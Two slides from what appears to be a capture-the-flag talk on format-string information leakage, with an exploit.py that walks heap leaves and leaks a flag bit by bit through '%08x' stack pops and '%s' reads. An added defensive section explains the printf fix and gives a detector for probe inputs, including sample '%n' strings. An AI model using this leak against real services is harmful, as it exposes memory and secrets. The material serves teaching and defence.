14. Information Leakage
• Using format string bug
[Figure: a chain of leaf nodes read through the format string. Each leaf holds Flag = 0x49 and a Child pointer, and the leak checks two things per leaf: whether the flag byte is 0x49 or 0x4C, and whether the child pointer is zero or not. Leaves are 0x20 bytes apart (+0x18 for the leaf itself, +0x08 for the chunk header), so starting from the given address the following leaves sit at given address + 0x20, given address + 0x40, …]
15. exploit.py
# Python 2 (the slide uses the print statement). pQ, read_until, f and addr are not
# shown on the slide; the definitions below are assumed: pQ packs a 64-bit
# little-endian value, read_until reads from the socket file object f up to a
# delimiter, and addr is the given address of the first leaf (see slide 14).
import struct

def pQ(x):
    return struct.pack('<Q', x)

def read_until(f, delim):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

addr = 0x0  # placeholder: replace with the given address of the first leaf

flag = ""
flag_next = ""
while flag_next != "L":            # a flag byte of 0x4C ('L') ends the leak
    c = 0
    for i in range(8):             # one leaf per bit, most significant bit first
        c = c << 1
        buf = '%08x' * 32          # pop stack slots until the two %s reach our addresses
        buf += ' !%s! '            # %s on addr: the leaf flag byte (0x49 'I' or 0x4C 'L')
        buf += ' !%s! '            # %s on addr + 8: the child pointer bytes (zero or not)
        buf += pQ(addr)
        buf += pQ(addr + 8)
        f.write(pQ(len(buf)) + buf)
        read_until(f, ' !')
        flag_next = read_until(f, '! ')[:-3]   # drop the trailing delimiter
        read_until(f, ' !')
        child = read_until(f, '! ')[:-3]
        if flag_next == 'L':
            break
        if child:                  # non-zero child pointer prints bytes: bit 1
            bit = 1
        else:                      # NULL child pointer prints nothing: bit 0
            bit = 0
        print bit,
        c += bit
        addr += 0x20               # next leaf: 0x18 leaf + 0x08 chunk header
    else:                          # all 8 bits read without hitting 'L'
        print ""
        flag += chr(c)
print("[*] flag: %s" % flag)
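From the defender's side, the leak on slide 15 only works because the service hands attacker-controlled bytes to printf as the format argument; the fix is to pass them as data (printf("%s", buf)) and to build with -Wformat-security so the compiler flags format arguments that are not literals. The following is an added example, not code from the slides, showing what a server-side or log-side check for the shape of such a probe looks like: it counts printf conversion directives in an input, separates memory-reading directives (%x, %p, %s) from the memory-writing %n, and flags inputs that carry a %n or a long run of reads. The sample inputs, the threshold of 4 and the function names are constructed for the example.

```python
import re

# Constructed sample inputs (not from the original slides). The first has the same
# shape as the slide-15 payload: 32 '%08x' stack pops followed by two '%s' reads.
# The real payload also appends two packed 8-byte addresses; this check only looks
# at the conversion directives, so they are left out here.
SAMPLES = [
    '%08x' * 32 + ' !%s!  !%s! ',
    'hello world',
    '100% done',            # '% d' is a valid directive (space flag) but reads no memory
    'discount: 50%s off',   # a single stray %s is a bug, not the shape of a probe
    'AAAA%n',               # %n writes to memory: always suspicious
]

# printf-style conversion: %[argpos$][flags][width][.precision][length]conversion
DIRECTIVE = re.compile(
    r'%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|q|j|z|t|L)?[diouxXeEfgGcspn%]'
)


def format_directives(data):
    """Return the conversion directives in data; a literal '%%' is not one."""
    return [m.group(0) for m in DIRECTIVE.finditer(data) if m.group(0) != '%%']


def classify(data, read_threshold=4):
    """Summarise why an input does or does not look like a format-string probe.

    memory_reads counts directives that dump stack words or dereference a pointer
    (%x, %X, %p, %s); memory_writes counts %n. A single %n, or a run of reads at or
    above read_threshold, marks the input as suspicious.
    """
    directives = format_directives(data)
    reads = sum(1 for d in directives if d[-1] in 'xXps')
    writes = sum(1 for d in directives if d[-1] == 'n')
    return {
        'directives': len(directives),
        'memory_reads': reads,
        'memory_writes': writes,
        'suspicious': writes > 0 or reads >= read_threshold,
    }


def scan(samples=SAMPLES):
    """Classify every sample and return the verdicts in input order."""
    return [classify(s) for s in samples]


if __name__ == '__main__':
    for sample, verdict in zip(SAMPLES, scan()):
        label = 'SUSPICIOUS' if verdict['suspicious'] else 'ok'
        print('%-12s reads=%d writes=%d %s' % (label, verdict['memory_reads'],
                                               verdict['memory_writes'], repr(sample)[:40]))
```

The check is deliberately about shape rather than exact bytes: the number of leading %08x pops differs per binary and per stack layout, but any legitimate input rarely needs more than a couple of conversion directives, and never %n. Run it over request bodies or over the service's own logs to spot the probing phase before a leak completes.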